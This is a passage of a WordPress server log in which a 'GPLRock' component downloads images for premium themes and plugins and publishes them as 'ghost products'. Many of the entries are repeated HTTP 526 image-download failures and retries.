/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dfb146d8.jpg [05-Apr-2026 14:38:06 UTC] GPLRock: Using pre-downloaded image for product eventon-qr-code: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dfb146d8.jpg [05-Apr-2026 14:38:06 UTC] GPLRock: Ghost product published with image - Product ID: eventon-qr-code [05-Apr-2026 14:38:08 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-anti-fraud-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f82b6b95.jpg [05-Apr-2026 14:38:08 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-anti-fraud-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f82b6b95.jpg [05-Apr-2026 14:38:08 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-anti-fraud-premium [05-Apr-2026 14:38:09 UTC] GPLRock: Image downloaded successfully for product formidable-forms-highrise-crm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0e85ca7.jpg [05-Apr-2026 14:38:09 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-highrise-crm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c0e85ca7.jpg [05-Apr-2026 14:38:09 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-highrise-crm [05-Apr-2026 14:38:11 UTC] GPLRock: Image downloaded successfully for product hashmag-magazine (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c16c02b.jpg [05-Apr-2026 14:38:11 UTC] GPLRock: Using pre-downloaded image for product hashmag-magazine: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2c16c02b.jpg [05-Apr-2026 14:38:11 UTC] GPLRock: Ghost product published with image - Product ID: hashmag-magazine [05-Apr-2026 14:39:36 UTC] GPLRock: Image download failed for product edge-decor-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:38 UTC] GPLRock: Image download failed for product edge-decor-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edge-decor--gardening--landscaping-wordpress-theme-25534.webp for product edge-decor-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:39:41 UTC] GPLRock: Image download failed for product edge-decor-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:43 UTC] GPLRock: Image download failed for product edge-decor-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edge-decor--gardening--landscaping-wordpress-theme-25534.webp for product edge-decor-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:39:45 UTC] GPLRock WARNING: Image download failed for product edge-decor-gardening-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/edge-decor--gardening--landscaping-wordpress-theme-25534.webp [05-Apr-2026 14:39:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edge-decor-gardening-landscaping-wordpress-theme [05-Apr-2026 14:39:45 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:47 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:39:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hooray--blog-wordpress-theme-for-professional-writers-32751.webp for product hooray-blog-wordpress-theme-for-professional-writers after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:39:49 UTC] GPLRock: Image download failed for product hooray-blog-wordpress-theme-for-professional-writers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:51:06 UTC] GPLRock: Image downloaded successfully for product thrive-themes-luxe-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5ca4cb5.jpg [05-Apr-2026 14:51:06 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-luxe-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f5ca4cb5.jpg [05-Apr-2026 14:51:06 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-luxe-wordpress-theme [05-Apr-2026 14:51:08 UTC] GPLRock: Image downloaded successfully for product thrive-themes-minus-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2279a937.jpg [05-Apr-2026 14:51:08 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-minus-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2279a937.jpg [05-Apr-2026 14:51:08 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-minus-wordpress-theme [05-Apr-2026 14:51:10 UTC] GPLRock: Image downloaded successfully for product thrive-themes-performag-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a208bddc.jpg [05-Apr-2026 14:51:10 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-performag-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a208bddc.jpg [05-Apr-2026 14:51:10 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-performag-wordpress-theme [05-Apr-2026 14:51:12 UTC] GPLRock: Image downloaded successfully for product thrive-themes-pressive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5bbe641.jpg [05-Apr-2026 14:51:12 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-pressive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a5bbe641.jpg [05-Apr-2026 14:51:12 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-pressive-wordpress-theme [05-Apr-2026 14:51:13 UTC] GPLRock: Image downloaded successfully for product notificationx-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6644d6f.jpg [05-Apr-2026 14:51:14 UTC] GPLRock: Using pre-downloaded image for product notificationx-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6644d6f.jpg [05-Apr-2026 14:51:14 UTC] GPLRock: Ghost product published with image - Product ID: notificationx-pro [05-Apr-2026 14:51:15 UTC] GPLRock: Image downloaded successfully for product jetblog-blogging-package-for-elementor-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-215c9b1f.jpg [05-Apr-2026 14:51:15 UTC] GPLRock: Using pre-downloaded image for product jetblog-blogging-package-for-elementor-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-215c9b1f.jpg [05-Apr-2026 14:51:15 UTC] GPLRock: Ghost product published with image - Product ID: jetblog-blogging-package-for-elementor-page-builder [05-Apr-2026 14:51:25 UTC] GPLRock: Image download failed for product jobmonster-job-board-wordpress-theme (attempt 1/3). HTTP Code: 0, Error: Connection timed out after 10002 milliseconds. Retrying... [05-Apr-2026 14:51:30 UTC] GPLRock: Image downloaded successfully for product jobmonster-job-board-wordpress-theme (attempt 2) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2ab7d22.jpg [05-Apr-2026 14:51:30 UTC] GPLRock: Using pre-downloaded image for product jobmonster-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a2ab7d22.jpg [05-Apr-2026 14:51:30 UTC] GPLRock: Ghost product published with image - Product ID: jobmonster-job-board-wordpress-theme [05-Apr-2026 14:51:31 UTC] GPLRock: Image downloaded successfully for product advanced-flat-rate-shipping-for-woocommerce-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a85a74b.jpg [05-Apr-2026 14:51:31 UTC] GPLRock: Using pre-downloaded image for product advanced-flat-rate-shipping-for-woocommerce-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a85a74b.jpg [05-Apr-2026 14:51:31 UTC] GPLRock: Ghost product published with image - Product ID: advanced-flat-rate-shipping-for-woocommerce-pro [05-Apr-2026 14:51:33 UTC] GPLRock: Image downloaded successfully for product woocommerce-royal-mail (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a17635ef.jpg [05-Apr-2026 14:51:33 UTC] GPLRock: Using pre-downloaded image for product woocommerce-royal-mail: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a17635ef.jpg [05-Apr-2026 14:51:33 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-royal-mail [05-Apr-2026 14:51:34 UTC] GPLRock: Image downloaded successfully for product white-label-branding-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4defc07.jpg [05-Apr-2026 14:51:34 UTC] GPLRock: Using pre-downloaded image for product white-label-branding-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4defc07.jpg [05-Apr-2026 14:51:34 UTC] GPLRock: Ghost product published with image - Product ID: white-label-branding-for-wordpress [05-Apr-2026 14:52:41 UTC] GPLRock: Image download failed for product gema-journal-inspired-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:43 UTC] GPLRock: Image download failed for product gema-journal-inspired-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gema---journal-inspired-wordpress-theme-15489.webp for product gema-journal-inspired-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:52:46 UTC] GPLRock: Image download failed for product gema-journal-inspired-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:48 UTC] GPLRock: Image download failed for product gema-journal-inspired-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gema---journal-inspired-wordpress-theme-15489.webp for product gema-journal-inspired-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:52:50 UTC] GPLRock WARNING: Image download failed for product gema-journal-inspired-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gema---journal-inspired-wordpress-theme-15489.webp [05-Apr-2026 14:52:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gema-journal-inspired-wordpress-theme [05-Apr-2026 14:52:50 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-bostami (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:52 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-bostami (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--bostami-6436.webp for product personal-portfolio-wordpress-theme-bostami after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:52:54 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-bostami (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:56 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-bostami (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:52:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--bostami-6436.webp for product personal-portfolio-wordpress-theme-bostami after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:52:58 UTC] GPLRock WARNING: Image download failed for product personal-portfolio-wordpress-theme-bostami. URL: https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--bostami-6436.webp [05-Apr-2026 14:52:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: personal-portfolio-wordpress-theme-bostami [05-Apr-2026 14:52:59 UTC] GPLRock: Image download failed for product modelish-a-unique-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:01 UTC] GPLRock: Image download failed for product modelish-a-unique-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modelish---a-unique-photography-wordpress-theme-13690.webp for product modelish-a-unique-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:03 UTC] GPLRock: Image download failed for product modelish-a-unique-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:05 UTC] GPLRock: Image download failed for product modelish-a-unique-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modelish---a-unique-photography-wordpress-theme-13690.webp for product modelish-a-unique-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:07 UTC] GPLRock WARNING: Image download failed for product modelish-a-unique-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/modelish---a-unique-photography-wordpress-theme-13690.webp [05-Apr-2026 14:53:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modelish-a-unique-photography-wordpress-theme [05-Apr-2026 14:53:07 UTC] GPLRock: Image download failed for product kulluu-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:09 UTC] GPLRock: Image download failed for product kulluu-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kulluu---creative-agency-wordpress-theme-19709.webp for product kulluu-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:12 UTC] GPLRock: Image download failed for product kulluu-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:14 UTC] GPLRock: Image download failed for product kulluu-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kulluu---creative-agency-wordpress-theme-19709.webp for product kulluu-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:16 UTC] GPLRock WARNING: Image download failed for product kulluu-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kulluu---creative-agency-wordpress-theme-19709.webp [05-Apr-2026 14:53:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kulluu-creative-agency-wordpress-theme [05-Apr-2026 14:53:16 UTC] GPLRock: Image download failed for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:18 UTC] GPLRock: Image download failed for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phototype---new-elementor-portoflio-wordpress-theme-2019-for-agency-photography--21597.webp for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:20 UTC] GPLRock: Image download failed for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:22 UTC] GPLRock: Image download failed for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phototype---new-elementor-portoflio-wordpress-theme-2019-for-agency-photography--21597.webp for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:24 UTC] GPLRock WARNING: Image download failed for product phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites. URL: https://meldwp.com/wp-content/uploads/phototype---new-elementor-portoflio-wordpress-theme-2019-for-agency-photography--21597.webp [05-Apr-2026 14:53:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: phototype-new-elementor-portoflio-wordpress-theme-2019-for-agency-photography-sites [05-Apr-2026 14:53:25 UTC] GPLRock: Image download failed for product morris-wordpress-app-product-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:27 UTC] GPLRock: Image download failed for product morris-wordpress-app-product-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morris---wordpress-app--product-landing-page-5280.webp for product morris-wordpress-app-product-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:29 UTC] GPLRock: Image download failed for product morris-wordpress-app-product-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:31 UTC] GPLRock: Image download failed for product morris-wordpress-app-product-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morris---wordpress-app--product-landing-page-5280.webp for product morris-wordpress-app-product-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:33 UTC] GPLRock WARNING: Image download failed for product morris-wordpress-app-product-landing-page. URL: https://meldwp.com/wp-content/uploads/morris---wordpress-app--product-landing-page-5280.webp [05-Apr-2026 14:53:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: morris-wordpress-app-product-landing-page [05-Apr-2026 14:53:33 UTC] GPLRock: Image download failed for product mono-a-modular-blogging-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:35 UTC] GPLRock: Image download failed for product mono-a-modular-blogging-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mono---a-modular-blogging-theme-for-wordpress-7264.webp for product mono-a-modular-blogging-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:38 UTC] GPLRock: Image download failed for product mono-a-modular-blogging-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:40 UTC] GPLRock: Image download failed for product mono-a-modular-blogging-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mono---a-modular-blogging-theme-for-wordpress-7264.webp for product mono-a-modular-blogging-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:42 UTC] GPLRock WARNING: Image download failed for product mono-a-modular-blogging-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/mono---a-modular-blogging-theme-for-wordpress-7264.webp [05-Apr-2026 14:53:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mono-a-modular-blogging-theme-for-wordpress [05-Apr-2026 14:53:42 UTC] GPLRock: Image download failed for product car-zone-towing-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:44 UTC] GPLRock: Image download failed for product car-zone-towing-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-zone---towing--repair-wordpress-theme-4452.webp for product car-zone-towing-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:47 UTC] GPLRock: Image download failed for product car-zone-towing-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:49 UTC] GPLRock: Image download failed for product car-zone-towing-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-zone---towing--repair-wordpress-theme-4452.webp for product car-zone-towing-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:51 UTC] GPLRock WARNING: Image download failed for product car-zone-towing-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/car-zone---towing--repair-wordpress-theme-4452.webp [05-Apr-2026 14:53:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: car-zone-towing-repair-wordpress-theme [05-Apr-2026 14:53:51 UTC] GPLRock: Image download failed for product virtus-modern-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:53 UTC] GPLRock: Image download failed for product virtus-modern-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtus---modern-blog--magazine-wordpress-theme-28653.webp for product virtus-modern-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:55 UTC] GPLRock: Image download failed for product virtus-modern-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:57 UTC] GPLRock: Image download failed for product virtus-modern-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:53:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtus---modern-blog--magazine-wordpress-theme-28653.webp for product virtus-modern-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:53:59 UTC] GPLRock WARNING: Image download failed for product virtus-modern-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/virtus---modern-blog--magazine-wordpress-theme-28653.webp [05-Apr-2026 14:53:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: virtus-modern-blog-magazine-wordpress-theme [05-Apr-2026 14:54:00 UTC] GPLRock: Image downloaded successfully for product worldwides-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ad452d2.webp [05-Apr-2026 14:54:00 UTC] GPLRock: Using pre-downloaded image for product worldwides-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ad452d2.webp [05-Apr-2026 14:54:00 UTC] GPLRock: Ghost product published with image - Product ID: worldwides-multipurpose-woocommerce-theme [05-Apr-2026 14:54:46 UTC] GPLRock: Image download failed for product tilt-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:49 UTC] GPLRock: Image download failed for product tilt-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tilt---creative-multipurpose-wordpress-theme-5310.webp for product tilt-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:54:51 UTC] GPLRock: Image download failed for product tilt-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:53 UTC] GPLRock: Image download failed for product tilt-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tilt---creative-multipurpose-wordpress-theme-5310.webp for product tilt-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:54:55 UTC] GPLRock WARNING: Image download failed for product tilt-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tilt---creative-multipurpose-wordpress-theme-5310.webp [05-Apr-2026 14:54:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tilt-creative-multipurpose-wordpress-theme [05-Apr-2026 14:54:55 UTC] GPLRock: Image download failed for product hampton-home-design-and-renovation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:57 UTC] GPLRock: Image download failed for product hampton-home-design-and-renovation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:54:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hampton--home-design-and-renovation-wordpress-theme-16508.webp for product hampton-home-design-and-renovation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:54:59 UTC] GPLRock: Image download failed for product hampton-home-design-and-renovation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:02 UTC] GPLRock: Image download failed for product hampton-home-design-and-renovation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hampton--home-design-and-renovation-wordpress-theme-16508.webp for product hampton-home-design-and-renovation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:04 UTC] GPLRock WARNING: Image download failed for product hampton-home-design-and-renovation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hampton--home-design-and-renovation-wordpress-theme-16508.webp [05-Apr-2026 14:55:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hampton-home-design-and-renovation-wordpress-theme [05-Apr-2026 14:55:04 UTC] GPLRock: Image download failed for product pathwell-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:06 UTC] GPLRock: Image download failed for product pathwell-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pathwell--senior-care-wordpress-theme-19229.webp for product pathwell-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:08 UTC] GPLRock: Image download failed for product pathwell-senior-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:10 UTC] GPLRock: Image download failed for product pathwell-senior-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pathwell--senior-care-wordpress-theme-19229.webp for product pathwell-senior-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:12 UTC] GPLRock WARNING: Image download failed for product pathwell-senior-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pathwell--senior-care-wordpress-theme-19229.webp [05-Apr-2026 14:55:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pathwell-senior-care-wordpress-theme [05-Apr-2026 14:55:12 UTC] GPLRock: Image download failed for product deaxautt-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:15 UTC] GPLRock: Image download failed for product deaxautt-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deaxautt---digital-marketing--agency-wordpress-theme-16984.webp for product deaxautt-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:17 UTC] GPLRock: Image download failed for product deaxautt-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:19 UTC] GPLRock: Image download failed for product deaxautt-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:55:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deaxautt---digital-marketing--agency-wordpress-theme-16984.webp for product deaxautt-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:55:21 UTC] GPLRock WARNING: Image download failed for product deaxautt-digital-marketing-agency-wordpress-theme. URL: 